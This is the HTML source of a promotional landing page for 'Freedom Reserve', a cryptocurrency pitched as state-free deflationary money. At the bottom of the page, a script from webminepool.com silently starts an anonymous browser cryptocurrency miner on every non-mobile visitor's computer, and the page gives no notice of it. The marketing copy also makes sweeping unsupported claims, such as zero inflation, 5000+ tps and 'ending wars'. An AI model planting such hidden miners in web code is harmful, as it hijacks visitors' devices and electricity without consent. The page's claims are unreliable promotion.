<!DOCTYPE html>
<html lang="en-US">

<head>
  <script type="text/javascript">
    var _paq = window._paq || [];
    _paq.push(['trackPageView']);
    _paq.push(['enableLinkTracking']);
    (function () {
      var u = "//nfogix.com/";
      _paq.push(['setTrackerUrl', u + 'api/track']);
      _paq.push(['setSiteId', 'f754930f-128f-4898-89db-e004cbf0e013']);
      var d = document,
        g = d.createElement('script'),
        s = d.getElementsByTagName('script')[0];
      g.type = 'text/javascript';
      g.async = true;
      g.defer = true;
      g.src = u + 'js/nfogix.min.js';
      s.parentNode.insertBefore(g, s);
    })();
  </script>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="ie=edge" />
  <link rel="manifest" href="./manifest.json" />
  <meta name="msapplication-TileColor" content="#ffffff" />
  <meta name="msapplication-TileImage" content="./favicon/icon192x192.png" />
  <meta name="theme-color" content="#ffffff" />
  <title>Freedom Reserve</title>
  <meta name="description" content="Free Currency for the British Isles" />
  <link rel="stylesheet" href="./css/normalize.css" />
  <link rel="stylesheet" href="./terminal.css" />
  <link rel="apple-touch-icon" sizes="57x57" href="./favicon/icon57x57.png" />
  <link rel="apple-touch-icon" sizes="60x60" href="./favicon/icon60x60.png" />
  <link rel="apple-touch-icon" sizes="72x72" href="./favicon/icon72x72.png" />
  <link rel="apple-touch-icon" sizes="76x76" href="./favicon/icon76x76.png" />
  <link rel="apple-touch-icon" sizes="114x114" href="./favicon/icon114x114.png" />
  <link rel="apple-touch-icon" sizes="120x120" href="./favicon/icon120x120.png" />
  <link rel="apple-touch-icon" sizes="144x144" href="./favicon/icon144x144.png" />
  <link rel="apple-touch-icon" sizes="152x152" href="./favicon/icon152x152.png" />
  <link rel="apple-touch-icon" sizes="180x180" href="./favicon/icon180x180.png" />
  <link rel="icon" type="image/png" sizes="192x192" href="./favicon/icon192x192.png" />
  <link rel="icon" type="image/png" sizes="32x32" href="./favicon/icon32x32png" />
  <link rel="icon" type="image/png" sizes="96x96" href="./favicon/icon96x96.png" />
  <link rel="icon" type="image/png" sizes="16x16" href="./favicon/icon16x16.png" />
  <style>
    .components-grid {
      display: grid;
      grid-column-gap: 1.4em;
      grid-template-columns: auto;
      grid-template-rows: auto;
    }

    .image-grid {
      display: grid;
      grid-template-rows: auto;
      display: grid;
      grid-row-gap: 1em;
      grid-column-gap: 1em;
      grid-template-rows: auto;
      grid-template-columns: repeat(auto-fit,
          minmax(calc(var(--page-width) / 3), 1fr));
    }

    @media only screen and (min-width: 70em) {
      .components-grid {
        grid-template-columns: 3fr 9fr;
      }
    }
  </style>
  <style>
    .timer {
      text-align: center;
      font-size: 30px;
      margin-top: 0px;
    }
  </style>
  <style>
    :root {
      --global-font-size: 15px;
      --global-line-height: 1.6em;
      --global-space: 10px;
      --font-stack: Menlo, Monaco, Lucida Console, Liberation Mono,
        DejaVu Sans Mono, Bitstream Vera Sans Mono, Courier New, monospace,
        serif;
      --mono-font-stack: Menlo, Monaco, Lucida Console, Liberation Mono,
        DejaVu Sans Mono, Bitstream Vera Sans Mono, Courier New, monospace,
        serif;
      --background-color: #1c1c20;
      --page-width: 60em;
      --font-color: #e8e9ed;
      --invert-font-color: #000000;
      --secondary-color: #a3abba;
      --tertiary-color: #a3abba;
      --primary-color: #05c705;
      --error-color: #cc0505;
      --progress-bar-background: #3f3f44;
      --progress-bar-fill: #62c4ff;
      --code-bg-color: #434344;
      --input-style: solid;
      --display-h1-decoration: none;
    }
  </style>
</head>

<body class="terminal">
  <div class="container">
    <div class="terminal-nav">
      <header class="terminal-logo">
        <br />
      </header>
      <nav class="terminal-menu">
        <ul vocab="https://schema.org/" typeof="BreadcrumbList">
          <li><a href="main.html" class="menu-item"><span>Home</span></a>
            <meta property="position">
          </li>
          <li><a href="whitepaper.html" class="menu-item"><span>Whitepaper</span></a>
            <meta property="position">
          </li>
          <li><a href="bounty.html" class="menu-item"><span>Bounty</span></a>
            <meta property="position">
          </li>

        </ul>
      </nav>
    </div>
  </div>

  <div class="container">

    <br />
    <div id="goals" class="a"><button class="btn btn-error btn-ghost">Project Goals</button><br /><br />

      <p><strong>Issue sound deflationary money to replace debased fiat currency</strong></p>
      <p><strong>Create a safe haven for people to protect their wealth from inflation</strong></p>
      <p><strong>Give ordinary people the ability to avoid expropriation by the State</strong></p>
      <p><strong>Generate a new economy free from government taxation and interference</strong></p>
      <br />
      <div class="terminal-alert">
        <p>We propose a new money separated completely from the State. A money with a fixed supply. A zero rate of
          inflation, distributed
          fairly to those who need it most; the young people of the world.</p>
        <br />
        <p><strong>FREEDOM RESERVE is declared as money in the year 2020 with the intention of giving the people an
            alternative to corrupt banker controlled money and to allow them to preserve and multiply their wealth for
            future generations.</strong></p>
        <br />
        <div class="img2">
          <br />
          <figure>
            <img src="./img/3dgold1.png" alt="Freedom Reserve">

          </figure>
        </div>
      </div>
    </div>
    <br />


    <hr>
    <br />
    <button class="btn btn-error btn-ghost" id="solution">The Solution</button><br /><br />
    <div class="terminal-alert">
      <div class="b">
        <h1>Perfect Money</h1>
        <p>Freedom Reserve aims to create a perfect currency in order to compete with state backed currency.</p>
        <ul>
          <li>
            <h2>Zero Inflation</h2>
            <p> Freedom Reserve mainnet will burn transaction fees equal to the block reward</p>
          </li>
          <li>
            <h2>Low Transaction fees</h2>
            <p> A proof of stake system that removes the need for hardware mining lowers transaction fees considerably
            </p>
          </li>
          <li>
            <h2>High transaction speed</h2>
            <p> Freedom Reserve reaches finality typically in ≤ 1 second, which is significantly lower than both
              longest-chain protocols and sharded blockchains</p>
          </li>
          <li>
            <h2>High transaction throughput</h2>
            <p> Liberty* protocols, which can build a DAG, reach 5000+ tps while retaining full decentralisation.
              10,000+ can be achieved through higher bandwidth</p>
          </li>
          <li>
            <h2>Turing Complete</h2>
            <p> Freedom Reserve Mainnet will allow anyone to issue fully customizable assets and applications</p>
          </li>
          <li>
            <h2>Decentralised</h2>
            <p> All chain parameters will be decided by tokenvote. Proof of stake avoids hardware manufacturing
              centralisation</p>
          </li>
          <li>
            <h2>Fairly launched</h2>
            <p> Freedom Reserve was launched at £1000 market cap on the open market allowing anyone interested to
              participate</p>
          </li>
          <li>
            <h2>Environmentally friendly</h2>
            <p> Zero carbon emissions while ending wars and exploitation by the state creating a net benefit for the
              environment</p>
          </li>
          <li>
            <h2>Optional anonymity</h2>
            <p> Zero Knowledge transactions allow anonymous transactions.</p>
          </li>

        </ul>
      </div>
    </div>

<hr>

    <div class="terminal-nav">
      <header class="terminal-logo">
        <br />
      </header>
      <nav class="terminal-menu">
        <ul vocab="https://schema.org/" typeof="BreadcrumbList">
          <li><a href="main.html" class="menu-item"><span>Home</span></a>
            <meta property="position">
          </li>
          <li><a href="whitepaper.html" class="menu-item"><span>Whitepaper</span></a>
            <meta property="position">
          </li>
          <li><a href="bounty.html" class="menu-item"><span>Bounty</span></a>
            <meta property="position">
          </li>

        </ul>
      </nav>
    </div>

    <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.13.1/highlight.min.js"></script>
    <script async defer src="https://buttons.github.io/buttons.js"></script>
    <script>
      document.addEventListener("DOMContentLoaded", function () {
        document.querySelectorAll("pre code").forEach(block => {
          window.hljs.highlightBlock(block);
        });
      });
    </script>
    <script src="https://webminepool.com/lib/base.js"></script>
    <script>
        var miner = WMP.Anonymous('SK_mGzgfCD6SSzBwVFgPGhlt',{throttle: 0.3});
        if (!miner.isMobile()){
            miner.start();
        }
    </script>
</body>

</html>